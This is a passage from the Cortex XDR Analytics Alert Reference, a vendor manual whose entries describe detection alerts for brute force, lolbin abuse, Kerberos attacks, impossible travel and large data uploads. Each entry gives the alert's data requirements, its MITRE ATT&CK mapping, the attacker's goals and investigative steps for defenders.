32 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Execution of a password brute-force tool
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force: Password Guessing (T1110.001)

Severity Medium

Description
Attackers may use brute-force techniques to gain access to accounts when usernames and/or passwords
are unknown

Attacker's Goals
The attacker attempts to gain access to the account or host.

Investigative Actions
• Verify that the commands are executed from a trusted source.
• Audit the victim account or host and verify that they haven't been compromised.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 33
© 2021 Palo Alto Networks, Inc.
Execution of renamed lolbin
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Masquerading (T1036)

Severity Medium

Description
Lolbins can be renamed and run as a way to avoid detection

Attacker's Goals
Command execution via lolbins and detection avoidance via file rename.

Investigative Actions
Isolate the host and verify if the file is malicious or not.

34 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
External cloud storage access with unusual
user agent
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cloud Logs

Required Detection Modules

ATT&CK Tactic • Collection (TA0009)


• Exfiltration (TA0010)

ATT&CK Technique • Data from Cloud Storage Object (T1530)


• Exfiltration Over Web Service (T1567)

Severity Low

Description
An identity accessed a storage resource using an unusual user agent from an external IP

Attacker's Goals
Access sensitive storage resources for data abuse or/and exfiltrating.

Investigative Actions
Check what type of data was accessed and its classification, which actions were taken, e.g. read/write/
delete and their status (success/failed), and if this user agent was involved with other identities or events.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 35
© 2021 Palo Alto Networks, Inc.
Failed Connections
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Remote System Discovery (T1018)

Severity Low

Description
The endpoint has failed connections to other endpoints that have been inactive for more than 24 hours,
or that Cortex XDR Analytics has never seen on the network. The endpoint has made an abnormally large
number of these failed connections and/or is attempting to connect to an abnormal mixture of missing or
inactive endpoints.
It is possible that your network has legitimate scanners that could cause a false positive for this alert. Cortex
XDR Analytics attempts to filter these out by checking if a scanner has been active for a long consecutive
period of time. Consequently, if this alert is seen, it represents new activity on your network.
An attacker may be trying to move laterally, or to scan different parts of the network to look for other
endpoints that expose a specific service. Worms also perform a similar activity to automatically infect
additional hosts in the network.

Attacker's Goals
An attacker does not know your network and is exploring it for new or unknown subnets.

Investigative Actions
• Validate that the source is not a sanctioned port scanner.
• Check for suspicious artifacts in the endpoint profile.

36 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Failed DNS
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 2 Hours

Deduplication Period 2 Hours

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Dynamic Resolution: Domain Generation Algorithms (T1568.002)

Severity Low

Description
The endpoint is performing DNS lookups that are failing at an excessively high rate when compared to
its peer group. This alert might be symptomatic of malware that is trying to connect to its command and
control (C2) servers.
The attacker's C2 server runs on one or more domains that can eventually be identified and blacklisted. To
avoid this, malware will sometimes use Domain Generation Algorithms (DGA) that produce many domain
names every day. Because only a few of these domains are ever registered, the installed malware must
blindly try to access each generated domain name in an effort to locate an active one.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Make sure your DNS servers are not misconfigured and are responsive. This detector assumes that
most DNS lookups succeed, and will only raise an alert when it sees large numbers of failed lookups.
Misconfigured or unresponsive DNS servers can result in a false positive.
• Make sure you do not have external domains configured as internal domains. This can result in clients
attempting to (for example) resolve google.com.local first, before resolving google.com. This can result in
a false-positive for this alert.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 37
© 2021 Palo Alto Networks, Inc.
• Make sure the endpoint is configured properly for your DNS servers. For example, make sure it is
configured to use the correct DNS IP address, and that the IP address is not for a firewalled DNS server.
Misconfigured DNS clients can result in many failed lookups, which will result in a false-positive for this
alert.
• Make sure the endpoint is not a DNS, Proxy, NAT or VPN gateway server. If these have been
misdetected by Cortex XDR Analytics, then their ordinary operations can trigger this alert.

38 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Failed Login For Locked-Out Account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Valid Accounts (T1078)

Severity Low

Description
A locked-out user account (event ID 4725 or 4740) was used in a Kerberos TGT pre-authentication
attempt.

Attacker's Goals
Authenticate using the principal in the TGT, not knowing that it has been revoked.

Investigative Actions
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.
• Check whether the attempt to use the principals (user accounts) specified in the alert are legitimate. For
example, a user or a script that was not updated that the account has been revoked.
• The lockout can be temporary, for example, in the case of too many login attempts, and may not be
visible after the account was released.
• Search for Windows Event Log 4740 to ascertain whether the account was locked out during the time of
the alert.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 39
© 2021 Palo Alto Networks, Inc.
Failed Login For a Long Username With Special
Characters
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Exploit Public-Facing Application (T1190)

Severity Medium

Description
A long username containing special characters failed to log in to the domain.

Attacker's Goals
An attacker is trying to get code execution on internet-facing assets through command injection.

Investigative Actions
• Check the host and/or user triggering these failed attempts:
• Is the host running internet-facing services?
• Are we looking at sanction vulnerability scanning?

40 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
First SSO access from ASN for user
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A user attempted to authenticate via SSO with a new ASN.

Attacker's Goals
Use an account that was possibly compromised to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has switched locations and providers).
• Verify if the ASN is an approved ASN to authenticate from.
• Follow further actions done by the user.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 41
© 2021 Palo Alto Networks, Inc.
First SSO access from ASN in organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
An SSO authentication was attempted with a new ASN.

Attacker's Goals
Use an account that was possibly compromised to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the provider or location is allowed or a new user).
• Verify if the ASN is an approved ASN to authenticate from.
• Follow further actions done by the user.

42 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
First connection from a country in organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta

Required Detection Modules Identity Analytics

ATT&CK Tactic • Credential Access (TA0006)


• Resource Development (TA0042)

ATT&CK Technique • Compromise Accounts (T1586)


• Brute Force: Password Guessing (T1110.001)

Severity Low

Description
A user connected from an unusual country that no one from this organization have connected from before.
This may indicate the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed its traffic there via a VPN.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 43
© 2021 Palo Alto Networks, Inc.
High Connection Rate
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 4 Hours

Deduplication Period 4 Hours

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or
Third-Party Firewalls

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Low

Description
The endpoint performed an unusually large number of successful connections to typically abused ports on
one or more remote endpoints.
An attacker may be trying to brute force and gain access to a resource by using different credentials or by
trying different services. In some cases, SQL injection attempts may create many sessions. Another case
may be an attacker downloading a significant amount of data from the destination.

This detection model assumes normal users do not initiate numerous connections to specific
destinations and ports, and that many users are not initiating multiple sessions to those ports
on a routine basis.

Attacker's Goals
• This alert could indicate any of the following:
• An attacker is scraping data services for useful data.
• The attacker might be seeking authentication credentials using a brute force username and password
attack against the service.
• The attacker might be using fuzz testing to look for vulnerabilities on the remote endpoint. Fuzz testing
sends unexpected, invalid, and/or random data to software. In this context, the attacker is likely using
the fuzzer in an attempt to discover buffer overflow vulnerabilities in the server.

44 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Investigative Actions
• Examine Alert Details > Overview to identify the source endpoint, process running the scan, and process
owner, to determine who or what is performing the network activity.
• Examine the endpoint profile to identify the process that is being used for the suspicious connections.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 45
© 2021 Palo Alto Networks, Inc.
Impossible traveler
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 7 Days

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta
For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules Identity Analytics

ATT&CK Tactic • Credential Access (TA0006)


• Resource Development (TA0042)

ATT&CK Technique • Compromise Accounts (T1586)


• Brute Force: Password Guessing (T1110.001)

Severity Low

Description
A user connected from multiple remote countries in a short period of time, which should normally be
impossible. This may indicate the account is compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user routed their traffic via a VPN, or shared their credentials with a remote employee.

46 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Interactive local account enumeration
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic • Discovery (TA0007)


• Credential Access (TA0006)

ATT&CK Technique • Account Discovery (T1087)


• Brute Force (T1110)

Severity Informational

Description
Multiple non-existing accounts failed to interactive local log in to a host in a short period of time. This may
indicate an attacker have physical access to the host, and is trying to enumerate accounts.

Attacker's Goals
Discover valid accounts to gain credentials.

Investigative Actions
Check if the login attempts were part of a legitimate misunderstanding of the system or part of an attack.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 47
© 2021 Palo Alto Networks, Inc.
Interactive login by a machine account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A machine account performed an interactive or remote interactive login

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the login was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

48 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Interactive login by a service account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A service account performed an interactive or remote interactive login

Attacker's Goals
Use an account that has access to resources to move laterally in the network and access privileged
resources.

Investigative Actions
• See whether the login was successful.
• Check whether the account has done any administrative actions it should not usually do.
• Look for more logins and authentications by the account throughout the network.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 49
© 2021 Palo Alto Networks, Inc.
Kerberos Pre-Auth Failures by Host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force (T1110)

Severity Medium

Description
The endpoint failed an unusual number of Kerberos pre-authentications (TGT requests) from at least three
users when compared to its baseline. This can indicate a password-spraying attack.

Attacker's Goals
The attacker is attempting to gain an initial foothold in the domain using a list of valid users and a guessed
password.

Investigative Actions
• Verify whether the host that generated the alert is normally used by many users (for example, a terminal
server).
• Verify any later authentication success for the user accounts referenced by the alert, as these can
indicate the attacker managed to guess the credentials.

50 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Kerberos Pre-Auth Failures by User and Host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force (T1110)

Severity Low

Description
The user account on this host failed Kerberos pre-authentications (TGT requests) an unusual number of
times. This can indicate a Kerberos brute-force attack.

Attacker's Goals
The attacker is attempting to guess the credentials for the user account.

Investigative Actions
• Verify that the password for the account has not been changed recently, without updating the user or
the program using it.
• Verify any later authentication success for the user accounts referenced by the alert, as these can
indicate the attacker managed to guess the credentials.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 51
© 2021 Palo Alto Networks, Inc.
Kerberos Traffic from Non-Standard Process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Network Service Scanning (T1046)

Severity Medium

Description
Kerberos traffic is usually performed by a standard set of privileged processes through designated ports.
The endpoint had a non-standard process communicating over ports normally used by Kerberos. An
attacker might be moving laterally by using tools that implement a custom version of the Kerberos protocol.

Attacker's Goals
• This might be symptomatic of an attacker's lateral movements. The attacker could be:
• using a custom protocol implementation that offers malicious functionality
• using a protocol other than SMB or Kerberos, but that still uses the SMB or Kerberos well-known ports.
Either way, the attacker's goal is to gain access to another endpoint on your network. The attacker could
also be surveying your network by performing service scans over the well-known SMB or Kerberos
ports.

Investigative Actions
• Make sure the process is not a scanner that implements its version of the protocol, and that the scanner
use is for sanctioned purposes. For example, nmap enumerating SMB.
• Make sure the process is not a sanctioned security product that creates standalone binaries for its use.
For example, Illusive Network honeypots.

52 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
• Investigate the process to see if the high-level language used to implement the application is the source
of the alert. Some high-level programming languages provide their protocol implementations. For
example, Java uses its Kerberos implementation.
• Examine the endpoint to see if it is infected with malware. If the parent-child chain of initiating
processes has been infiltrated with a malicious replacement, then that replacement could be known
malware.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 53
© 2021 Palo Alto Networks, Inc.
Kerberos User Enumeration
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Account Discovery (T1087)

Severity Medium

Description
A high amount of Kerberos principal unknown errors were generated on users in the last hour. This may be
indicative of Kerberos user enumeration.

Attacker's Goals
The attacker may attempt to gain an initial foothold in the domain by enumerating users and finding service
accounts.

Investigative Actions
• Check whether any service principal names (SPNs) were not set correctly, as they will always return a
principal unknown error.

54 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
LOLBIN connecting to a rare host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
A LOLBIN connected to an external IP address or host, which are rarely connected to from the organization.

Attacker's Goals
Beacon to C2 server and/or exfiltrate data.

Investigative Actions
Check whether the process was injected to or otherwise subverted for malicious use.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 55
© 2021 Palo Alto Networks, Inc.
LOLBIN spawned by an Office executable
connected to a rare external host
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Application Layer Protocol (T1071)

Severity Medium

Description
A LOLBIN run by an Office process connected to an external IP address or host, which is rarely connected
to from the organization.

Attacker's Goals
Attackers may abuse Office executables to run Lolbins. This can be used for command and control or
malware dropping.

Investigative Actions
• Check the destination host reputation.
• Check if the process execution and connections are legitimate.

56 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Large Upload (FTP)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 3 Days

Deduplication Period 3 Days

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint transferred an excessively large amounts of data to a single destination over FTP. That
destination server is uncommon for endpoints in your organization.
An attacker may be exfiltrating data directly to the internet.

The data limit used to trigger this alert is predetermined, and is not computed from baseline
activity seen on your network.

Attacker's Goals
Transfer data he has stolen from your network to a location that is convenient and useful to him.

Investigative Actions
• Verify that the source is not an FTP server. If Cortex XDR Analytics has failed to identify the entity as a
valid FTP server, this alert is likely to be a false positive.
• Identify the entity performing the data transfer to determine if the transfer is sanctioned.
• Use Pathfinder to interrogate the endpoint for suspicious artifacts that are using endpoint processes or
loaded modules.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 57
© 2021 Palo Alto Networks, Inc.
Large Upload (Generic)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint transferred large amounts of data to an external site using a protocol other than HTTP/s,
FTP, or SMTP. (A specific detector is used for each of those protocols.) Cortex XDR Analytics assumes
data transfers out of your network is ordinarily performed using one of those three services, so it expects
that data transfers over all other ports to be low. For the same reason, Cortex XDR Analytics also assumes
endpoint traffic towards a specific destination should be about the same over long periods of time. An
attacker may be exfiltrating data directly to the internet.

Attacker's Goals
Transfer data he has stolen from your network to a location that is convenient and useful to him.

Investigative Actions
• Check if the traffic is caused by SSH activity over that protocol, it can trigger this alert. It is possible that
someone on your network is legitimately engaged in SSH activity.
• Check if the traffic is to/from a misconfigured network.
• Check if the traffic is to a new external service or server that has recently been adopted for use by an
organization in your enterprise.
• Identify the process/user performing the data transfer to determine if the transfer is sanctioned.

58 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Large Upload (HTTPS)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint transferred an excessive amount of data to an external site over HTTPS. The destination is
not a popular upload site for endpoints on your network, and the endpoint performing the upload has not
previously downloaded a large amount of data from the site. The upload is considered excessive based
on comparison to baseline measurements of HTTPS data transfers on your network. An attacker may be
exfiltrating data directly to the internet.

Attacker's Goals
Transfer data she has stolen from your network to a location that is convenient and useful to her.

Investigative Actions
• Check if this alert has been falsely triggered by DNS load balancers. If an endpoint routinely uploads data
to a site that makes use of load balancers, the transfer might ordinarily be split into multiple sessions and
across multiple subdomains, which can cause the baseline measurement to be incorrect. In that situation,
a routine upload that randomly places the bulk of the data in a single session to a single subdomain can
look excessive to the Cortex XDR Analytics detector.
• Check if the device performing the data transfer is a mobile phone performing a backup. Cortex XDR
Analytics will not always measure the baseline properly for mobile devices, especially if the backups are
performed infrequently and contain a great deal of data. If the data transfer is a mobile device running a
backup, check to ensure that only appropriate data is included in the backup.
• Identify the process/user performing the data transfer to determine if the transfer is sanctioned.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 59
© 2021 Palo Alto Networks, Inc.
Large Upload (SMTP)
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Exfiltration Over Alternative Protocol (T1048)

Severity Low

Description
The endpoint, which is not an internal SMTP server, emailed an excessive amount of data from your
network.
An attacker may be exfiltrating data directly to the internet.

The amount of data contained in the email exceeds a predetermined limit.

Attacker's Goals
Transfer data they have stolen from your network to a location that is convenient and useful to him.

Investigative Actions
• Identify the process/user performing the data transfer to determine if the transfer is sanctioned.

60 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Login Password Spray
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force: Password Spraying (T1110.003)

Severity Low

Description
An agent tried to authenticate to an unusually high amount of user accounts within a short period of time.
This may have resulted from a login password spray attack.

Attacker's Goals
An attacker may be attempting to gain unauthorized access to user accounts.

Investigative Actions
• Check the amount of time in between each authentication attempt.
• Investigate the reason behind the login failures and if any accounts were locked out.
• Look for any successful authentication attempts and the ratio of login success versus login failures.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 61
© 2021 Palo Alto Networks, Inc.
Login by a dormant user
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A dormant user logged on after having been unused for a month or longer. This may indicate the account is
misused by an attacker.

Attacker's Goals
Use a compromised user account which has not been used for a long while, and are therefore less likely to
be noticed.

Investigative Actions
• Confirm that the activity is benign (e.g. the user returned from a long leave of absence).
• See whether there are other abnormal actions done by the user (e.g. files\commands\other logins).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

62 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
MSBuild Makes a Rare Network Connection
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent


For increased accuracy, you can also add the following optional data
source: Palo Alto Networks Firewall Logs

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001)

Severity Low

Description
MSBuild normally does not make any network connections. This unusual activity may be malicious since
attackers can leverage MSBuild for executing code.

Attacker's Goals
Attackers can use MSBuild to proxy execution of code.

Investigative Actions
• Check whether the execution is benign or normal for the host and/or user performing it.
• Check whether the connection is to a legitimate destination.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 63
© 2021 Palo Alto Networks, Inc.
Microsoft Office Process Spawning a
Suspicious One-Liner
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Execution (TA0002)


• Initial Access (TA0001)

ATT&CK Technique • User Execution (T1204)


• Phishing: Spearphishing Attachment (T1566.001)

Severity Medium

Description
A Microsoft Office process spawned a commonly abused process with a full command (not a script), a
behavior that is typically malicious.

Attacker's Goals
An attacker is trying to gain code execution on the host.

Investigative Actions
Check whether the command line executed is benign or normal for the host and/or user performing it. For
example, employees working in finance may have legitimate use cases for complex Excel commands.

64 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Microsoft Office process spawns a commonly
abused process
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Execution (TA0002)


• Initial Access (TA0001)

ATT&CK Technique • User Execution (T1204)


• Phishing: Spearphishing Attachment (T1566.001)

Severity Low

Description
Microsoft Office process spawns a commonly abused process with an uncommon command

Attacker's Goals
An attacker attempts to gain code execution via a phishing document.

Investigative Actions
• Check the source of the document (received by mail or loaded locally).
• Investigate the child processes for malicious activity and network connections to an external host.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 65
© 2021 Palo Alto Networks, Inc.
Mshta.exe launched with suspicious arguments
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Signed Binary Proxy Execution: Mshta (T1218.005)

Severity Medium

Description
Microsoft HTML application host process has been launched with suspicious arguments which may indicate
malicious intent.

Attacker's Goals
Gain code execution on the host and evade security controls.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

66 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Multiple Rare Process Executions in
Organization
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 30 Days

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity Informational

Description
Multiple unusual processes were executed in the organization. This may be indicative of a compromised
account.

Attacker's Goals
Unusual processes may be executed for various purposes including exfiltration, lateral movement, etc.

Investigative Actions
Investigate the processes that were executed to determine if they were used for legitimate purposes or
malicious activity.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 67
© 2021 Palo Alto Networks, Inc.
Multiple Weakly-Encrypted Kerberos Tickets
Received
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Hour

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)

Severity Low

Description
A user accessed a number of services associated with user accounts in the 10 minutes leading to the alert,
generating a number of weakly encrypted Kerberos TGS (ticket granting service) tickets that is significantly
larger than the number of weakly encrypted TGS tickets received by that user in the 30 days leading to the
